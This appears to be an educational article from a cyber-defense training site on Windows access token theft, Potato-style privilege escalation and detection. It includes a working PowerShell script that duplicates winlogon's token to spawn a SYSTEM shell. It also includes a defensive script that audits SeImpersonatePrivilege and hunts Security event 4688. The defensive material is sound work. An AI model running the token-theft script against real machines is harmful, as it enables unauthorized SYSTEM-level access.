Windows Token Manipulation
Techniques for stealing and forging Windows access tokens to impersonate users and escalate privileges.
Windows token manipulation involves stealing, duplicating, or forging access tokens to impersonate other users or escalate privileges. Access tokens are the fundamental authorization mechanism in Windows, containing the security context under which threads and processes run.
Every Windows process carries a primary access token holding the user SID, group memberships, privileges, integrity level and logon session ID; a thread may additionally carry an impersonation token. Two privileges matter most: SeImpersonatePrivilege, which lets a caller impersonate a token it has obtained and hand it to CreateProcessWithTokenW, and SeAssignPrimaryTokenPrivilege, which lets a caller assign a primary token to a new process through CreateProcessAsUser. Stealing a token from a running process means opening that process (SeDebugPrivilege for processes owned by other users, which is why this route normally starts from an elevated administrator), opening its token with TOKEN_DUPLICATE, duplicating it with DuplicateTokenEx into a new primary token, and starting a process with it. Tools like Incognito (also built into Meterpreter) enumerate the tokens present on a system and impersonate them, distinguishing delegation tokens, which can authenticate to remote hosts, from impersonation tokens, which are only valid locally. The Potato family (Hot, Rotten, Juicy and Rogue Potato, PrintSpoofer) takes the opposite route for low-privileged service accounts: rather than opening a SYSTEM process, they coerce a SYSTEM-owned component such as DCOM activation or the print spooler into authenticating to an attacker-controlled endpoint (typically a named pipe), then impersonate that client and duplicate the resulting SYSTEM token, which requires only SeImpersonatePrivilege. Token manipulation also supports lateral movement: the delegation token of a domain user with an interactive or RDP session on the compromised host, or of a service running under a domain account, can be impersonated to reach file shares, SQL Server instances and other hosts as that user without ever learning their password.
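The process-token theft chain described above, as an added PowerShell example that is not code from the original article: it opens a target process, duplicates its primary token and spawns a new process under it. It assumes an elevated PowerShell on a supported Windows version whose caller holds SeDebugPrivilege (to open processes owned by other users) and SeImpersonatePrivilege (required by CreateProcessWithTokenW); the class name `TokenSteal` and the function names are this example's own.

```powershell
# Added example, not from the original article. Chain: OpenProcess -> OpenProcessToken -> DuplicateTokenEx
# -> CreateProcessWithTokenW. Assumes elevated PowerShell holding SeDebugPrivilege and SeImpersonatePrivilege.
$Sig = @'
using System;
using System.Runtime.InteropServices;
public class TokenSteal {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public int PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize; public int dwXCountChars;
        public int dwYCountChars; public int dwFillAttribute; public int dwFlags; public short wShowWindow;
        public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr hProc, uint access, out IntPtr hTok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr hTok, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hTok, uint access, IntPtr attrs, int impLevel, int tokType, out IntPtr hNew);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hTok, uint logonFlags, string app, string cmd, uint createFlags,
        IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
'@
Add-Type -TypeDefinition $Sig

function Get-LastErr { [Runtime.InteropServices.Marshal]::GetLastWin32Error() }

function Enable-Privilege([string]$Name) {
    # Privileges in the caller's token start disabled; turn one on with AdjustTokenPrivileges.
    $hTok = [IntPtr]::Zero
    # 0x0028 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
    if (-not [TokenSteal]::OpenProcessToken([TokenSteal]::GetCurrentProcess(), 0x0028, [ref]$hTok)) { throw "OpenProcessToken: $(Get-LastErr)" }
    $luid = New-Object TokenSteal+LUID
    if (-not [TokenSteal]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "LookupPrivilegeValue: $(Get-LastErr)" }
    $tp = New-Object TokenSteal+TOKEN_PRIVILEGES
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = 0x2        # SE_PRIVILEGE_ENABLED
    $ok  = [TokenSteal]::AdjustTokenPrivileges($hTok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = Get-LastErr   # the call "succeeds" even if the privilege is absent; 1300 = ERROR_NOT_ALL_ASSIGNED
    [void][TokenSteal]::CloseHandle($hTok)
    if (-not $ok -or $err -eq 1300) { throw "$Name is not held by this token (error $err)" }
}

function Invoke-TokenSteal {
    param([Parameter(Mandatory)][int]$ProcessId, [string]$CommandLine = 'cmd.exe')
    Enable-Privilege 'SeDebugPrivilege'
    $hProc = [TokenSteal]::OpenProcess(0x0400, $false, $ProcessId)           # PROCESS_QUERY_INFORMATION
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($ProcessId): $(Get-LastErr)" }
    $hTok = [IntPtr]::Zero                                                   # 0x000A = TOKEN_DUPLICATE | TOKEN_QUERY
    if (-not [TokenSteal]::OpenProcessToken($hProc, 0x000A, [ref]$hTok)) { throw "OpenProcessToken: $(Get-LastErr)" }
    # Duplicate into a fresh primary token (TokenPrimary = 1) at SecurityImpersonation (2); 0x02000000 = MAXIMUM_ALLOWED.
    $hDup = [IntPtr]::Zero
    if (-not [TokenSteal]::DuplicateTokenEx($hTok, 0x02000000, [IntPtr]::Zero, 2, 1, [ref]$hDup)) { throw "DuplicateTokenEx: $(Get-LastErr)" }
    $si = New-Object TokenSteal+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf([TokenSteal+STARTUPINFO])
    $pi = New-Object TokenSteal+PROCESS_INFORMATION
    # 0x10 = CREATE_NEW_CONSOLE; logonFlags 0 means the child simply runs under the duplicated token.
    if (-not [TokenSteal]::CreateProcessWithTokenW($hDup, 0, $null, $CommandLine, 0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
        throw "CreateProcessWithTokenW: $(Get-LastErr)"
    }
    foreach ($h in $pi.hThread, $pi.hProcess, $hDup, $hTok, $hProc) { [void][TokenSteal]::CloseHandle($h) }
    return $pi.dwProcessId
}

# Usage: borrow winlogon's token to get a SYSTEM shell (winlogon runs as SYSTEM on every session host).
$target = (Get-Process winlogon | Select-Object -First 1).Id
Invoke-TokenSteal -ProcessId $target
```

This is the same sequence Incognito and Meterpreter's steal_token perform. Run from a plain service account the chain fails at OpenProcess, because SeDebugPrivilege is missing; that gap is exactly what the Potato techniques sidestep by having SYSTEM come to the attacker's named pipe instead.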
Token manipulation is a cornerstone of Windows post-exploitation. SeImpersonatePrivilege is granted by default to Administrators, LOCAL SERVICE, NETWORK SERVICE and the SERVICE group, and every account that logs on as a service is a member of SERVICE, so a compromised IIS application pool, SQL Server instance or other application service can usually escalate to SYSTEM with a Potato-style attack even though the account is neither an administrator nor SYSTEM. Understanding token mechanics is critical for defenders: keep services that do not need client impersonation off hosts that run services which do, review which accounts hold SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege and SeDebugPrivilege, and, with process creation auditing enabled, watch Security event 4688 for a Target Subject that differs from the Creator Subject (the trace left by CreateProcessWithTokenW and CreateProcessAsUser), alongside 4624 logon type 9 (NewCredentials, produced by runas /netonly and by LOGON_NETCREDENTIALS_ONLY) and 4672 for unexpected accounts receiving sensitive privileges.
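The defender-side checks described above, as an added PowerShell example that is not code from the original article: an audit of who holds SeImpersonatePrivilege on the host, a mapping of service logon accounts that inherit it, and a hunt over Security event 4688 for processes created under a token other than their creator's. It assumes an elevated PowerShell with "Audit Process Creation" enabled for the live hunt; the function names, the benign-parent list and the sample event are this example's own.

```powershell
# Added example, not from the original article. Assumes elevated PowerShell; live 4688 hunting needs
# "Audit Process Creation" enabled. Function names and the benign-parent list are assumptions to tune locally.

function Get-ImpersonateHolders {
    # secedit exports the User Rights Assignment policy; the line of interest looks like
    # SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
    $inf = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $inf /quiet | Out-Null
    $line = Get-Content $inf | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
    Remove-Item $inf -ErrorAction SilentlyContinue
    if (-not $line) { return @() }
    foreach ($entry in (($line -split '=', 2)[1] -split ',')) {
        $entry = $entry.Trim()
        $sid = if ($entry.StartsWith('*')) { $entry.Substring(1) } else { $null }
        $name = $entry
        if ($sid) {
            try { $name = (New-Object Security.Principal.SecurityIdentifier $sid).Translate([Security.Principal.NTAccount]).Value }
            catch { $name = $sid }
        }
        [pscustomobject]@{ Sid = $sid; Account = $name }
    }
}

function Get-ExposedServiceAccounts {
    $holders = Get-ImpersonateHolders
    # Every service logon carries the SERVICE group (S-1-5-6), so the privilege is inherited unless removed there.
    $serviceGroupHolds = [bool]($holders | Where-Object { $_.Sid -eq 'S-1-5-6' })
    Get-CimInstance Win32_Service | Group-Object StartName | ForEach-Object {
        $acct = $_.Name                       # note: Win32_Service reports SYSTEM as "LocalSystem"
        $direct = [bool]($holders | Where-Object { $_.Account -eq $acct })
        [pscustomobject]@{
            LogonAccount     = $acct
            Services         = ($_.Group.Name -join ', ')
            HoldsImpersonate = $direct -or $serviceGroupHolds
        }
    }
}

# Parents that legitimately start processes under other tokens (service start, logon, UAC). Tune per environment.
$script:BenignCreators = @('\services.exe', '\svchost.exe', '\winlogon.exe', '\wininit.exe', '\userinit.exe', '\consent.exe')

function Test-TokenSwap4688 {
    param([Parameter(Mandatory)][xml]$EventXml)
    $d = @{}
    foreach ($n in $EventXml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    # Windows fills the Target Subject only when the new process's token differs from the creator's;
    # otherwise TargetUserSid is the NULL SID (S-1-0-0).
    if (-not $d.TargetUserSid -or $d.TargetUserSid -eq 'S-1-0-0' -or $d.TargetUserSid -eq $d.SubjectUserSid) { return $null }
    $parent = [string]$d.ParentProcessName
    foreach ($b in $script:BenignCreators) { if ($parent.EndsWith($b, 'OrdinalIgnoreCase')) { return $null } }
    [pscustomobject]@{
        Creator    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
        RunsAs     = "$($d.TargetDomainName)\$($d.TargetUserName)"
        Parent     = $parent
        NewProcess = $d.NewProcessName
    }
}

function Find-TokenSwapProcessCreation([int]$MaxEvents = 5000) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        ForEach-Object { Test-TokenSwap4688 ([xml]$_.ToXml()) } | Where-Object { $_ }
}

# Constructed sample 4688 (not a real capture): an IIS worker account spawning cmd.exe under SYSTEM's token.
$sample = @'
<Event><EventData>
  <Data Name="SubjectUserSid">S-1-5-21-1000-2000-3000-1105</Data><Data Name="SubjectUserName">svc_web</Data><Data Name="SubjectDomainName">CORP</Data>
  <Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data><Data Name="ParentProcessName">C:\Windows\System32\inetsrv\w3wp.exe</Data>
  <Data Name="TargetUserSid">S-1-5-18</Data><Data Name="TargetUserName">SYSTEM</Data><Data Name="TargetDomainName">NT AUTHORITY</Data>
</EventData></Event>
'@
Test-TokenSwap4688 ([xml]$sample)   # flagged: Creator CORP\svc_web, RunsAs NT AUTHORITY\SYSTEM, parent w3wp.exe
Get-ExposedServiceAccounts | Where-Object HoldsImpersonate
```

The 4688 check catches the token-swap itself rather than any particular tool, so it also fires on CreateProcessAsUser from a stolen SYSTEM token; expect to whitelist a few more parents (scheduler, management agents) before it is quiet enough to alert on.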
CDA examines token manipulation within the IAT domain as part of identity-based attack techniques. Theater missions include scenarios where operators must both exploit and defend against token-based attacks. Training emphasizes least privilege for service accounts and monitoring token-related events.
Written by CDA Editorial